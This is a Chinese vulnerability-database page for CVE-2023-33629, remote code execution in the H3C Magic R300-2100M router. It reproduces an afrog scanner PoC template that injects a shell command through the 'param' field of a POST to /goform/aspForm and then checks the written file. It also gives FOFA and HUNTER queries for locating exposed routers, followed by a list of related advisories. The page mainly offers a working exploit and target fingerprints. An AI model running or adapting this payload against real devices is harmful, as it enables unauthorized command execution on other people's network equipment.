CVE-2023-33629: H3C Magic R300-2100M RCE

日期: 2025-09-01 | 影响软件: H3C Magic R300-2100M | POC: 已公开

漏洞描述

H3C Magic R300是中国新华三（H3C）公司的一款无线路由器。H3C Magic R300版本R300-2100MV100R004中包含的堆栈溢出漏洞。该漏洞通过DeltriggerList接口在/goform/aspForm处发生。 FOFA: app="H3C-Ent-Router" HUNTER: app.name="H3C Router Management"

PoC代码[已公开]

id: CVE-2023-33629

info:
  name: H3C Magic R300-2100M RCE
  author: zan8in
  severity: critical
  verified: true
  description: |
    H3C Magic R300是中国新华三（H3C）公司的一款无线路由器。H3C Magic R300版本R300-2100MV100R004中包含的堆栈溢出漏洞。该漏洞通过DeltriggerList接口在/goform/aspForm处发生。
    FOFA: app="H3C-Ent-Router"
    HUNTER: app.name="H3C Router Management"
  affected: H3C Magic R300 R300-2100MV100R004
  reference: 
    - https://mp.weixin.qq.com/s/c8FeLqNLv6kP0B0qy7Nx2Q
    - https://mp.weixin.qq.com/s/sWQdB39akVlFHDepZO2mrA
  tags: cve,cve2023,h3c,rce
  created: 2023/07/26

set:
  randstr: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /goform/aspForm
      body: "CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/{{randstr}});"
    expression: response.status == 302 && response.body.bcontains(b'do_cmd.asp')
  r1:
    request:
      method: GET
      path: /{{randstr}}
    expression: response.status == 200 && response.body.bcontains(b'www') && response.body.bcontains(b'www_multi')
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-33629.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2023-33629: H3C Magic R300-2100M - Remote Code Execution POC

H3C Magic R300-2100M 缓冲区错误漏洞 无POC

H3C Magic R300-2100M 缓冲区错误漏洞 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

H3C Magic R300-2100M 缓冲区错误漏洞无POC

H3C Magic R300-2100M 缓冲区错误漏洞无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC